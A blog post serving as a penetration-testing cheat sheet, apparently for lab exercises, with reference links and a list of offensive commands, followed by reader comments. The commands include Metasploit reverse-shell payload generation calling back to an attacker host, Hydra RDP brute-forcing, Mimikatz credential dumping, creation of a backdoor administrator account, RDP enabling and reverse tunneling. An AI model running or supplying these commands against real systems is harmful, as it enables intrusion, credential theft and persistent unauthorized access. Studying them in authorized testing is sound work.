I personally require quick access to few commands, and some links while working on Penetration Testing exercises, so decided to post below information on this blog :)
General Links
- Enumeration
- Online Hash Cracking
- Dump Windows Password Hashesh
- Nikto Basics
- SQLmap Tool
- Reverse Shell Cheet Sheets
- One Liner Shells
- SQL Character Encoder
- Unicorn Scanner
Privilege Escalation Links:
- http://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation.html
- http://pentestmonkey.net/tools/audit/unix-privesc-check
- http://www.madleets.com/Thread-Local-Root-Collection
- http://www.rebootuser.com/?p=1758
Tunneling & Port Forwarding:
- http://magikh0e.ihtb.org/pubPapers/ssh_gymnastics_tunneling.html (Very Good)
- http://www.debianadmin.com/howto-use-ssh-local-and-remote-port-forwarding.html
- http://www.danscourses.com/Network-Penetration-Testing/metasploit-pivoting.html
- http://carnal0wnage.attackresearch.com/2007/09/using-metasploit-to-pivot-through_06.html
- http://www.offensive-security.com/metasploit-unleashed/Portfwd
- http://www.offensive-security.com/metasploit-unleashed/Pivoting
- http://www.howtoforge.com/reverse-ssh-tunneling
- http://ftp.acc.umu.se/pub/putty/putty-0.57/htmldoc/Chapter7.html (Plink)
- http://www.offensive-security.com/metasploit-unleashed/Msfvenom
Handy Commands:
Scans all ports with 10000 Pakctes rate:
unicornscan X.X.X.X:a -r10000 -v
Python:
python -c 'import pty;pty.spawn("/bin/bash")'
python -m SimpleHTTPServer (Starting HTTP Server)
Hydra:
hydra -l admin -P /root/Desktop/passwords -S X.X.X.X rdp (Self Explanatory)
Mount Remote Windows Share:
smbmount //X.X.X.X/c$ /mnt/remote/ -o username=user,password=pass,rw
Metasploit Payloads:
msfpayload windows/meterpreter/reverse_tcp LHOST=10.10.10.10 X > system.exe
msfpayload php/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=443 R > exploit.php
msfpayload windows/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=443 R | msfencode -t asp -o file.asp
msfpayload windows/meterpreter/reverse_tcp LHOST=X.X.X.X LPORT=443 R | msfencode -e x86/shikata_ga_nai -b "\x00" -t c
Plink Tunnel:
plink.exe -P 22 -l root -pw "1234" -R 445:127.0.0.1:445 X.X.X.X
Enable RDP Access:
reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0
netsh firewall set service remoteadmin enable
netsh firewall set service remotedesktop enable
Nmap WebDAV Scanning:
nmap -p80,8080 --script=http-iis-webdav-vuln
Meterpreter:
run getgui -u admin -p 1234
run vnc -p 5043
Add User Windows:
net user test 1234 /add
net localgroup administrators test /add
Mimikatz:
privilege::debug
sekurlsa::logonPasswords full
Compiling Windows Exploits on Backtrack:
cd /root/.wine/drive_c/MinGW/bin
wine gcc -o ability.exe /tmp/exploit.c -lwsock32
wine ability.exe
Nasm Command:
nasm -f bin -o payload.bin payload.asm
To Be Continued....
Hope its helpful to all of you!
My last night in the lab tonight!!! Great post!!! Wish you had post this long time ago!! hehe
ReplyDeletehehe..thanx buddy..i will share more info soon..!
ReplyDeleteThanks for sharing. Learn a lot from your Blog.I have read your blog about Penetration Testing It is very help full.I really enjoyed reading it, you may be a great author.I must say you've done a wonderful job by sharing your article with us. External penetration testing
ReplyDelete